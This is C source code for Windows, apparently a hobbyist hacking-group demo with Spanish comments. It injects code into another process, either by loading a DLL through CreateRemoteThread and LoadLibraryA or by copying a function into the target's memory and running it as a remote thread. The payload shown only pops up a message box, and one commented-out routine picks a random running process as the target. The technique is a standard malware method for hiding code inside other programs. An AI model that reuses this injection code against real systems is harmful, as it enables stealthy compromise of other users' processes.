//Coded By Sha0@BadCheckSum.com //Visita http://www.BadCheckSum.com y aprende con nosotros. #include #include #include #include #include #define PROCESO 380 //Pon un proceo que tenga una ventana, esa ventana volcara messagebox ;) typedef struct { FARPROC load; FARPROC proc; FARPROC modul; FARPROC resul; HMODULE hResul; char msg[50]; char user32[20]; char msgbox[20]; } param; int do_random (int maxvalue) { struct tm *ahora; time_t t; time (&t); ahora = localtime (&t); srand(ahora->tm_sec); return rand()%maxvalue; } //esta funcion es la reostia, he inyectado codigo un thread //nuevo de otro proceso, sin necesidad de usar dll //un sistema mejor que este seria calcular el deltaoffset void funcion (param *pp) { pp->hResul = (HMODULE)pp->load(pp->user32); pp->resul = (FARPROC)pp->proc(pp->hResul,pp->msgbox); pp->resul (0,pp->msg,pp->msg,0); return; } void funcion_length (void) { } void injectadll (DWORD pid) { DWORD bytesread; DWORD size = 0x39; HMODULE hKernel = GetModuleHandle ("Kernel32"); char laura[]="c:\\dev-cpp\\experiments\\dll\\fuck.dll"; HANDLE hProcess = OpenProcess (0x1f0fff,0,pid); DWORD *vd = VirtualAllocEx (hProcess,0,size,MEM_COMMIT,PAGE_EXECUTE_READWRITE); WriteProcessMemory (hProcess,vd,&laura,sizeof(laura),&bytesread); HANDLE hThread = CreateRemoteThread (hProcess,NULL,0,(LPTHREAD_START_ROUTINE) GetProcAddress(hKernel,"LoadLibraryA"), vd, 0, NULL); WaitForSingleObject (hThread,INFINITE); CloseHandle (hThread); VirtualFreeEx (hProcess,vd,size,MEM_RELEASE); CloseHandle (hProcess); } void injecta (DWORD pid) { DWORD bytesread; DWORD size = (LPBYTE)funcion_length-(LPBYTE)funcion; HMODULE k = LoadLibrary ("kernel32"); param pp,pg; pp.load = GetProcAddress (k,"LoadLibraryA"); pp.proc = GetProcAddress (k,"GetProcAddress"); pp.modul = GetProcAddress (k,"GetModuleHandle"); strcpy (pp.msg,"Iniciando sesión."); strcpy (pp.user32,"user32.dll"); strcpy (pp.msgbox,"MessageBoxA"); HANDLE hProcess = OpenProcess (0x1f0fff,0,pid); //DWORD *vf = VirtualAllocEx (hProcess,0,size,MEM_COMMIT,PAGE_EXECUTE_READWRITE); DWORD *vf = VirtualAlloc (0,size,MEM_COMMIT,PAGE_EXECUTE_READWRITE); param *vd = (param *)VirtualAllocEx (hProcess,0,sizeof(param),MEM_COMMIT,PAGE_EXECUTE_READWRITE); WriteProcessMemory (hProcess,vf,&funcion,size,&bytesread); WriteProcessMemory (hProcess,vd,&pp,sizeof(param),&bytesread); HANDLE hThread = CreateRemoteThread (hProcess,0,0, (LPTHREAD_START_ROUTINE)vf, vd, 0, 0); /* WaitForSingleObject (hThread,INFINITE); //ReadProcessMemory (hProcess, vd, &pg, sizeof(param),&bytesread); printf ("retvalue: 0x%x\n",pg.retvalue); CloseHandle (hThread); VirtualFree (vf,size,MEM_RELEASE); VirtualFreeEx (hProcess,vd,size,MEM_RELEASE); CloseHandle (hProcess);*/ } DWORD busca_procesos (void) { PROCESSENTRY32 pe; DWORD pid[200]; int maxPid = 0; int i; HANDLE hSnapshot = CreateToolhelp32Snapshot (TH32CS_SNAPPROCESS,0); pe.dwSize = sizeof(PROCESSENTRY32); BOOL retval = Process32First (hSnapshot, &pe); while (retval) { pid[maxPid++] = pe.th32ProcessID; //printf ("Proceso: %d\n",pe.th32ProcessID); pe.dwSize=sizeof(PROCESSENTRY32); retval = Process32Next (hSnapshot,&pe); } CloseHandle (hSnapshot); return pid[do_random(maxPid)]; } int main (void) { //injecta (busca_procesos()); injecta (PROCESO); return 0; }